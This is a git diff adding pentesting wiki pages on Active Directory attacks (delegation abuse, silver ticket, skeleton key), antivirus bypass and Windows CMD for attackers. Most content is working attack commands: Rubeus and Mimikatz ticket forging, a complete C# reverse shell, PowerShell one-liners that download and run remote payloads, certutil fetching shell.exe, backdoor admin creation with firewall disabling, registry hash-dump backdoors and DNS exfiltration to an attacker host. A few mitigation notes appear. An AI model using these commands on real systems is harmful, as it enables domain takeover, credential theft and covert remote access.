+3. The attacker uses Rubeus to perform a **full S4U attack** \(S4U2Self and S4U2Proxy\) from Service A to Service B for a user **with privileged access to Service B**. 
+   1. S4U2Self \(from the SPN compromised/created account\): Ask for a **TGS of Administrator to me** \(Not Forwardable\).
+   2. S4U2Proxy: Use the **not Forwardable TGS** of the step before to ask for a **TGS** from **Administrator** to the **victim host**.
+   3. Even if you are using a not Forwardable TGS, as you are exploiting Resource-based constrained delegation, it will work.
+4. The attacker can **pass-the-ticket** and **impersonate** the user to gain **access to the victim**.
+
+To check the _**MachineAccountQuota**_ of the domain you can use:
+
+```text
+Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select MachineAccountQuota
+```
+
+## Attack
+
+### Creating a Computer Object
+
+You can create a computer object inside the domain using [powermad](https://github.com/Kevin-Robertson/Powermad)**:**
+
+```csharp
+import-module powermad
+New-MachineAccount -MachineAccount FAKECOMPUTER -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
+```
+
+![](../../.gitbook/assets/b1.png)
+
+```bash
+Get-DomainComputer FAKECOMPUTER #Check if created if you have powerview
+```
+
+### Configuring R**esource-based Constrained Delegation**
+
+```bash
+Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount FAKECOMPUTER$ #Assing delegation privileges
+Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it work
+```
+
+![](../../.gitbook/assets/b2.png)
+
+### Performing a complete S4U attack
+
+First of all, we created the new Computer object with the password `123456`, so we need the hash of that password:
+
+```bash
+.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER /domain:domain.local
+```
+
+This will print the RC4 and AES hashes for that account.  
+Now, the attack can be performed:
+
+```bash
+rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt
+```
+
+![](../../.gitbook/assets/b3.png)
+
+### Accessing
+
+The last command line will perform the **complete S4U attack and will inject the TGS** from Administrator to the victim host in **memory**.  
+In this example it was requested a TGS for the **CIFS** service from Administrator, so you will be able to access **C$**:
+
+```bash
+ls \\victim.domain.local\C$
+```
+
+![](../../.gitbook/assets/b4.png)
+
+## References
+
+{% embed url="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html" %}
+
+{% embed url="https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/" %}
+
+{% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution\#modifying-target-computers-ad-object" %}
+
+{% embed url="https://blog.stealthbits.com/resource-based-constrained-delegation-abuse/" %}
+
+
+
+
+
diff --git a/windows/active-directory-methodology/security-descriptors.md b/windows/active-directory-methodology/security-descriptors.md
new file mode 100644
index 00000000..b7c26f03
--- /dev/null
+++ b/windows/active-directory-methodology/security-descriptors.md
@@ -0,0 +1,33 @@
+# Security Descriptors
+
+## Security Descriptors
+
+Security Descriptor Definition Language \(SDDL\) defines the format which is used to describe a security descriptor. SDDL uses ACE strings for DACL and SACL:: `ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;`
+
+The **security descriptors** are used to **store** the **permissions** an **object** has **over** an **object**. If you can just **make** a **little change** in the **security descriptor** of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group.
+
+Then, this persistence technique is based on the hability to win every privilege needed against certain objects, to be able to perform a task that usually requires admin privileges but without the need of being admin.
+
+You can give a user access to **execute remotely WMI** [**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1):
+
+```bash
+Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
+Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
+```
+
+Give access to **winrm PS console to a user** [**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)**:**
+
+```bash
+Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
+Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
+```
+
+Access the **registry** and **dump hashes** creating a **Reg backdoor using** [**DAMP**](https://github.com/HarmJ0y/DAMP)**,** so you can at any moment retrieve the **hash of the computer**, the **SAM** and any **cached AD** credential in the computer. So, it's very useful to give this permission to a **regular user against a Domain Controller computer**:
+
+```bash
+Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
+Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
+Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
+Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
+```
+
diff --git a/windows/active-directory-methodology/silver-ticket.md b/windows/active-directory-methodology/silver-ticket.md
new file mode 100644
index 00000000..29ef142d
--- /dev/null
+++ b/windows/active-directory-methodology/silver-ticket.md
@@ -0,0 +1,44 @@
+# Silver Ticket
+
+## Silver ticket
+
+The Silver ticket attack is based on **crafting a valid TGS for a service once the NTLM hash of service is owned** \(like the **PC account hash**\). Thus, it is possible to **gain access to that service** by forging a custom TGS **as any user**.
+
+In this case, the NTLM hash of a computer account \(which is kind of a user account in AD\) is owned. Hence, it is possible to craft a ticket in order to get into that machine with administrator privileges through the SMB service. The computer accounts reset their passwords every 30 days by default.
+
+It also must be taken into account that it is possible to forge tickets using the AES Kerberos keys \(AES128 and AES256\). To know how to generate an AES key read: [section 4.4 of MS-KILE](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/936a4878-9462-4753-aac8-087cd3ca4625) or the [Get-KerberosAESKey.ps1](https://gist.github.com/Kevin-Robertson/9e0f8bfdbf4c1e694e6ff4197f0a4372).
+
+{% code title="Linux" %}
+```bash
+python ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park -spn cifs/labwws02.jurassic.park  stegosaurus
+export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache 
+python psexec.py jurassic.park/stegosaurus@labwws02.jurassic.park -k -no-pass
+```
+{% endcode %}
+
+ In Windows, **Mimikatz** can be used to **craft** the **ticket**. Next, the ticket is **injected** with **Rubeus**, and finally a remote shell can be obtained thanks to **PsExec**.
+
+{% code title="Windows" %}
+```bash
+#Create the ticket
+mimikatz.exe "kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park"
+#Inject in memory using mimikatz or Rubeus
+mimikatz.exe "kerberos::ptt ticket.kirbi"
+.\Rubeus.exe ptt /ticket:ticket.kirbi
+#Obtain a shell
+.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
+```
+{% endcode %}
+
+The **CIFS** service is the one that allows you to **access the file system of the victim**. You can find other services here: [**https://adsecurity.org/?page\_id=183**](https://adsecurity.org/?page_id=183)**.** For example, you can use the **HOST service** to create a _**schtask**_ in a computer. Then you can check if this has worked trying to list the tasks of the victim: `schtasks /S <hostname>`  or you can use the **HOST and** **RPCSS service** to execute **WMI** queries in a computer, test it doing: `Get-WmiObject -Class win32_operatingsystem -ComputerName <hostname>`
+
+### Mitigation
+
+Silver ticket events ID \(more stealth than golden ticket\):
+
+* 4624: Account Logon
+* 4634: Account Logoff
+* 4672: Admin Logon
+
+\*\*\*\*[**More information about Silver Tickets in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets)\*\*\*\*
+
diff --git a/windows/active-directory-methodology/skeleton-key.md b/windows/active-directory-methodology/skeleton-key.md
new file mode 100644
index 00000000..d0715103
--- /dev/null
+++ b/windows/active-directory-methodology/skeleton-key.md
@@ -0,0 +1,47 @@
+# Skeleton Key
+
+## **Skeleton Key**
+
+**From:** [**https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/**](https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/)\*\*\*\*
+
+There are several methods for compromising Active Directory accounts that attackers can use to elevate privileges and create persistence once they have established themselves in your domain. The Skeleton Key is a particularly scary piece of malware targeted at Active Directory domains to make it alarmingly easy to hijack any account. This malware **injects itself into LSASS and creates a master password that will work for any account in the domain**. Existing passwords will also continue to work, so it is very difficult to know this attack has taken place unless you know what to look for.
+
+Not surprisingly, this is one of the many attacks that is packaged and very easy to perform using [Mimikatz](https://github.com/gentilkiwi/mimikatz). Let’s take a look at how it works.
+
+#### Requirements for the Skeleton Key Attack
+
+In order to perpetrate this attack, **the attacker must have Domain Admin rights**. This attack must be **performed on each and every domain controller for complete compromise, but even targeting a single domain controller can be effective**. **Rebooting** a domain controller **will remove this malware** and it will have to be redeployed by the attacker.
+
+#### Performing the Skeleton Key Attack
+
+Performing the attack is very straightforward to do. It only requires the following **command to be run on each domain controller**: `misc::skeleton`. After that, you can authenticate as any user with the default password of Mimikatz.
+
+![Injecting a skeleton key using the misc::skeleton into a domain controller with Mimikatz](https://blog.stealthbits.com/wp-content/uploads/2017/07/1-3.png)
+
+Here is an authentication for a Domain Admin member using the skeleton key as a password to get administrative access to a domain controller: 
+
+![Using the skeleton key as a password with the misc::skeleton command to get administrative access to a domain controller with the default password of Mimikatz](https://blog.stealthbits.com/wp-content/uploads/2017/07/2-5.png)
+
+Note: If you do get a message saying, “System error 86 has occurred. The specified network password is not correct”, just try using the domain\account format for the username and it should work. 
+
+![Using the domain\account format for the username if you get a message saying System error 86 has occurred The specified network password is not correct](https://blog.stealthbits.com/wp-content/uploads/2017/07/3-3.png)
+
+If lsass was **already patched** with skeleton, then this **error** will appear:
+
+![](../../.gitbook/assets/image%20%28267%29.png)
+
+### Mitigations
+
+Skeleton Key
+
+* Events:
+  * System Event ID 7045 - A service was installed in the system. \(Type Kernel Mode driver\)
+  * Security Event ID 4673 – Sensitive Privilege Use \("Audit privilege use" must be enabled\)
+  * Event ID 4611 – A trusted logon process has been registered with the Local Security Authority \("Audit privilege use" must be enabled\)
+* `Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "`_`Kernel Mode Driver"}`_
+* This only detect mimidrv `Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$`_`.message -like "Kernel Mode Driver" -and $`_`.message -like "`_`mimidrv`_`"}`
+* Mitigation:
+  * Run lsass.exe as a protected process, it forces an attacker to load a kernel mode driver
+  * `New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -Value 1 -Verbose`
+  * Verify after reboot: `Get-WinEvent -FilterHashtable @{Logname='System';ID=12} | ?{$_.message -like "`_`protected process"}`_
+
diff --git a/windows/active-directory-methodology/unconstrained-delegation.md b/windows/active-directory-methodology/unconstrained-delegation.md
new file mode 100644
index 00000000..71b722e1
--- /dev/null
+++ b/windows/active-directory-methodology/unconstrained-delegation.md
@@ -0,0 +1,41 @@
+# Unconstrained Delegation
+
+## Unconstrained delegation
+
+This a feature that a Domain Administrator can set to any **Computer** inside the domain. Then, anytime a **user logins** onto the Computer, a **copy of the TGT** of that user is going to be **sent inside the TGS** provided by the DC **and saved in memory in LSASS**. So, if you have Administrator privileges on the machine, you will be able to **dump the tickets and impersonate the users** on any machine.
+
+So if a domain admin logins inside a Computer with "Unconstrained Delegation" feature activated, and you have local admin privileges inside that machine, you will be able to dump the ticket and impersonate the Domain Admin anywhere \(domain privesc\).
+
+ You can **find Computer objects with this attribute** checking if the [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832%28v=vs.85%29.aspx) attribute contains [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300%28v=vs.85%29.aspx). You can do this with an LDAP filter of ‘\(userAccountControl:1.2.840.113556.1.4.803:=524288\)’, which is what powerview does:
+
+```bash
+Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
+#Export tickets with Mimikatz
+privilege::debug
+sekurlsa::tickets /export #Recommended way
+kerberos::list /export #Another way
+```
+
+Load the ticket of Administrator \(or victim user\) in memory with **Mimikatz** or **Rubeus for a** [**Pass the Ticket**](pass-the-ticket.md)**.**  
+More info: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)  
+[**More information about Unconstrained delegation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)\*\*\*\*
+
+### **Automatically compromising a Print server**
+
+If an attacker is able to **compromise a computer allowed for "Unconstrained Delegation"**, he could **trick** a **Print server** to **automatically login** against it **saving a TGT** in the memory of the server.  
+Then, the attacker could perform a **Pass the Ticket attack to impersonate** the user Print server computer account.
+
+To make a print server login against any machine you can use [**SpoolSample**](https://github.com/leechristensen/SpoolSample):
+
+```bash
+.\SpoolSample.exe printmachine unconstrinedmachine
+```
+
+If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse.md#dcsync) and obtain all the hashes from the DC.  
+[**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)\*\*\*\*
+
+### Mitigation
+
+* Limit DA/Admin logins to specific services
+* Set "Account is sensitive and cannot be delegated" for privileged accounts.
+
diff --git a/windows/av-bypass.md b/windows/av-bypass.md
new file mode 100644
index 00000000..38dc0147
--- /dev/null
+++ b/windows/av-bypass.md
@@ -0,0 +1,214 @@
+# AV Bypass
+
+## **Telnet Server**
+
+Until Windows10, all Windows came with a **Telnet server** that you could install \(as administrator\) doing:
+
+```text
+pkgmgr /iu:"TelnetServer" /quiet
+```
+
+Make it **start** when the system is started and **run** it now:
+
+```text
+sc config TlntSVR start= auto obj= localsystem
+```
+
+**Change telnet port** \(stealth\) and disable firewall:
+
+```text
+tlntadmn config port=80
+netsh advfirewall set allprofiles state off
+```
+
+## UltraVNC
+
+Download it from: [http://www.uvnc.com/downloads/ultravnc.html](http://www.uvnc.com/downloads/ultravnc.html)
+
+**Execute** _**winvnc.exe**_ and configure the server:
+
+* Enable the option _Disable TrayIcon_
+* Set a password in _VNC Password_
+* Set a password in _View-Only Password_
+
+Then, move the binary _**winvnc.exe**_ and **newly** created file _**UltraVNC.ini**_ inside the **victim**
+
+### **Reverse connection**
+
+The **attacker** should **execute inside** his **host** the binary `vncviewer.exe -listen 5900` so it will be **prepared** to catch a reverse **VNC connection**.  
+Then, it should execute inside the **victim**: `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900`
+
+## GreatSCT
+
+Download it from: [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
+
+```text
+git clone https://github.com/GreatSCT/GreatSCT.git
+cd GreatSCT/setup/
+./setup.sh
+cd ..
+./GreatSCT.py
+```
+
+Inside GreatSCT:
+
+```text
+use 1
+list #Listing available payloads
+use 9 #rev_tcp.py
+set lhost 10.10.14.0
+sel lport 4444
+generate #payload is the default name
+#This will generate a meterpreter xml and a rcc file for msfconsole
+```
+
+Now **start the lister** with `msfconsole -r file.rc` and **execute** the **xml payload** with:
+
+```text
+C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
+```
+
+**Current defender will terminate the process very fast.**
+
+## Compiling our own reverse shell
+
+ https://medium.com/@Bank\_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
+
+#### First C\# Revershell
+
+Compile it with:
+
+```text
+c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt
+```
+
+Use it with:
+
+```text
+back.exe <ATTACKER_IP> <PORT>
+```
+
+```text
+using System;
+using System.Text;
+using System.IO;
+using System.Diagnostics;
+using System.ComponentModel;
+using System.Linq;
+using System.Net;
+using System.Net.Sockets;
+
+
+namespace ConnectBack
+{
+	public class Program
+	{
+		static StreamWriter streamWriter;
+
+		public static void Main(string[] args)
+		{
+			using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))
+			{
+				using(Stream stream = client.GetStream())
+				{
+					using(StreamReader rdr = new StreamReader(stream))
+					{
+						streamWriter = new StreamWriter(stream);
+						
+						StringBuilder strInput = new StringBuilder();
+
+						Process p = new Process();
+						p.StartInfo.FileName = "cmd.exe";
+						p.StartInfo.CreateNoWindow = true;
+						p.StartInfo.UseShellExecute = false;
+						p.StartInfo.RedirectStandardOutput = true;
+						p.StartInfo.RedirectStandardInput = true;
+						p.StartInfo.RedirectStandardError = true;
+						p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
+						p.Start();
+						p.BeginOutputReadLine();
+
+						while(true)
+						{
+							strInput.Append(rdr.ReadLine());
+							//strInput.Append("\n");
+							p.StandardInput.WriteLine(strInput);
+							strInput.Remove(0, strInput.Length);
+						}
+					}
+				}
+			}
+		}
+
+		private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
+        {
+            StringBuilder strOutput = new StringBuilder();
+
+            if (!String.IsNullOrEmpty(outLine.Data))
+            {
+                try
+                {
+                    strOutput.Append(outLine.Data);
+                    streamWriter.WriteLine(strOutput);
+                    streamWriter.Flush();
+                }
+                catch (Exception err) { }
+            }
+        }
+
+	}
+}
+```
+
+[https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple\_Rev\_Shell.cs](https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple_Rev_Shell.cs)
+
+## C\# using compiler
+
+```text
+C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt
+```
+
+[REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066](https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066)
+
+[REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639](https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639)
+
+Automatic download and execution:
+
+```text
+64bit:
+powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
+
+32bit:
+powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
+```
+
+[https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f](https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f)
+
+## C++
+
+```text
+sudo apt-get install mingw-w64
+
+i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
+```
+
+[https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp](https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp)
+
+Merlin, Empire, Puppy, SalsaTools https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/
+
+[https://www.blackhat.com/docs/us-16/materials/us-16-Mittal-AMSI-How-Windows-10-Plans-To-Stop-Script-Based-Attacks-And-How-Well-It-Does-It.pdf](https://www.blackhat.com/docs/us-16/materials/us-16-Mittal-AMSI-How-Windows-10-Plans-To-Stop-Script-Based-Attacks-And-How-Well-It-Does-It.pdf)
+
+https://github.com/l0ss/Grouper2
+
+{% embed url="http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html" %}
+
+{% embed url="http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/" %}
+
+## More
+
+{% embed url="https://github.com/EgeBalci/sgn" %}
+
+{% embed url="https://github.com/persianhydra/Xeexe-TopAntivirusEvasion" %}
+
+
+
diff --git a/windows/basic-cmd-for-pentesters.md b/windows/basic-cmd-for-pentesters.md
new file mode 100644
index 00000000..7165e2e9
--- /dev/null
+++ b/windows/basic-cmd-for-pentesters.md
@@ -0,0 +1,428 @@
+# Basic CMD for Pentesters
+
+## System info
+
+### Version and Patches info
+
+```bash
+wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
+systeminfo
+systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
+wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
+hostname
+DRIVERQUERY #3rd party driver vulnerable?
+```
+
+### Environment
+
+```bash
+set #List all environment variables
+```
+
+Some env variables to highlight:
+
+* **COMPUTERNAME**: Name of the computer
+* **TEMP/TMP:** Temp folder
+* **USERNAME:** Your username
+* **HOMEPATH/USERPROFILE:** Home directory
+* **windir:** C:\Windows
+* **OS**:Windos OS
+* **LOGONSERVER**: Name of domain controller
+* **USERDNSDOMAIN**: Domain name to use with DNS
+* **USERDOMAIN**: Name of the domain
+
+```bash
+nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
+```
+
+### Mounted disks
+
+```bash
+(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
+```
+
+### AV
+
+```bash
+WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
+```
+
+### Recycle Bin
+
+```bash
+dir C:\$Recycle.Bin /s /b
+```
+
+### Processes, Services & Software
+
+```bash
+schtasks /query /fo LIST /v #Verbose out of scheduled tasks
+tasklist /V #List processes
+tasklist /SVC #links processes to started services
+net start #Windows Services started
+wmic service list brief #List services
+sc query #List of services
+dir /a "C:\Program Files" #Installed software
+dir /a "C:\Program Files (x86)" #Installed software
+reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
+```
+
+## Domain info
+
+```bash
+echo %USERDOMAIN% #Get domain name
+echo %USERDNSDOMAIN% #Get domain name
+echo %logonserver% #Get name of the domain controller
+set logonserver #Get name of the domain controller
+set log #Get name of the domain controller
+net groups /domain #List of domain groups
+net group "domain computers" /domain #List of PCs connected to the domain
+net view /domain #Lis of PCs of the domain
+nltest /dclist:<DOMAIN> #List domain controllers
+net group "Domain Controllers" /domain #List PC accounts of domains controllers
+net group "Domain Admins" /domain #List users with domain admin privileges
+net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the grup "Domain Admins" is included here)
+net user /domain #List all users of the domain
+net user <ACCOUNT_NAME> /domain #Get information about that user
+net accounts /domain #Password and lockout policy
+nltest /domain_trust #Mapping of the trust relationships.
+```
+
+### Logs & Events
+
+```bash
+#Make a security query using another credentials
+wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
+```
+
+## Users & Groups
+
+### Users
+
+```bash
+whoami /all #All info about me, take a look at the enabled tokens
+whoami /priv #Show only privileges
+net users #All users
+dir /b /ad "C:\Users"
+net user %username% #Info about a user (me)
+net accounts #Information about password requirements
+qwinsta #Anyone else logged in?
+cmdkey /list #List credential
+net user /add [username] [password] #Create user
+
+#Lauch new cmd.exe with new creds (to impersonate in network)
+runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
+```
+
+### Groups
+
+```bash
+#Local
+net localgroup #All available groups
+net localgroup Administrators #Info about a group (admins)
+new localgroup administrators [username] /add #Add user to administrators
+
+#Domain
+net group /domain #Info about domain groups
+net group /domain <domain_group_name> #Users that belongs to the group
+```
+
+### List sessions
+
+```text
+qwinsta
+klist sessions
+```
+
+### Persistence with users
+
+```bash
+# Add domain user and put them in Domain Admins group
+net user username password /ADD /DOMAIN
+net group "Domain Admins" username /ADD /DOMAIN
+
+# Add local user and put them local Administrators group
+net user username password /ADD
+net localgroup Administrators username /ADD
+
+# Add user to insteresting groups:
+net localgroup "Remote Desktop Users" UserLoginName  /add
+net localgroup "Debugger users" UserLoginName /add
+net localgroup "Power users" UserLoginName /add
+```
+
+## Network
+
+### Interfaces, Routes, Ports, Hosts and DNSCache
+
+```bash
+ipconfig /all #Info about interfaces
+route print #Print available routes
+arp -A #Know hosts
+netstat -ano #Opened ports?
+type C:\WINDOWS\System32\drivers\etc\hosts
+ipconfig /displaydns | findstr "Record" | findstr "Name Host"
+```
+
+### Firewall
+
+```bash
+netsh firewall show state # FW info, open ports
+netsh advfirewall firewall show rule name=all
+netsh firewall show config # FW info
+Netsh Advfirewall show allprofiles
+
+NetSh Advfirewall set allprofiles state off  #Turn Off
+NetSh Advfirewall set allprofiles state on  #Trun On
+netsh firewall set opmode disable #Turn Off
+
+::How to open ports
+netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
+netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
+netsh firewall add portopening TCP 3389 "Remote Desktop" 
+
+::Enable Remote Desktop
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
+netsh firewall add portopening TCP 3389 "Remote Desktop"
+::netsh firewall set service remotedesktop enable #I found that this line is not needed
+::sc config TermService start= auto #I found that this line is not needed
+::net start Termservice #I found that this line is not needed
+
+::Enable Remote assistance:
+reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
+netsh firewall set service remoteadmin enable
+
+::Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
+net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
+
+::Connect to RDP (using hash or password)
+xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
+xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
+```
+
+### Shares
+
+```bash
+net view #Get a list of computers
+net view /all /domain [domainname] #Shares on the domains
+net view \\computer /ALL #List shares of a computer
+net use x: \\computer\share #Mount the share locally
+net share #Check current shares
+```
+
+### Wifi
+
+```bash
+netsh wlan show profile #AP SSID
+netsh wlan show profile <SSID> key=clear #Get Cleartext Pass
+```
+
+### SNMP
+
+```text
+reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
+```
+
+## Misc
+
+```bash
+cd #Get current dir
+cd C:\path\to\dir #Change dir
+dir #List current dir
+dir /a:h C:\path\to\dir #List hidden files
+dir /s /b #Recursive list without shit
+time #Get current time
+date #Get current date
+shutdown /r /t 0 #Shutdown now
+type <file> #Cat file
+
+#Download
+certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
+bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
+    
+#Runas
+runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
+runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
+
+#Hide
+attrib +h file #Set Hidden
+attrib -h file #Quit Hidden
+
+#Give full control over a file that you owns
+icacls <FILE_PATH> /t /e /p <USERNAME>:F
+icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision
+
+#Recursive copy to smb
+xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
+
+#exe2bat to transform exe file in bat file
+
+#ADS
+dir /r #Detect ADS
+more file.txt:ads.txt #read ADS
+powershell (Get-Content file.txt -Stream ads.txt)
+```
+
+### Listen address ACLs
+
+You can listen on [http://+:80/Temporary\_Listen\_Addresses/](http://+:80/Temporary_Listen_Addresses/) without being administrator.
+
+```bash
+netsh http show urlacl
+```
+
+### Manual DNS shell
+
+**Attacker** \(Kali\) must use one of these 2 options:
+
+```bash
+sudo responder -I <iface> #Active
+sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive 
+```
+
+#### Victim
+
+_**for /f tokens**_ ****technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server
+
+```text
+for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
+for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
+for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
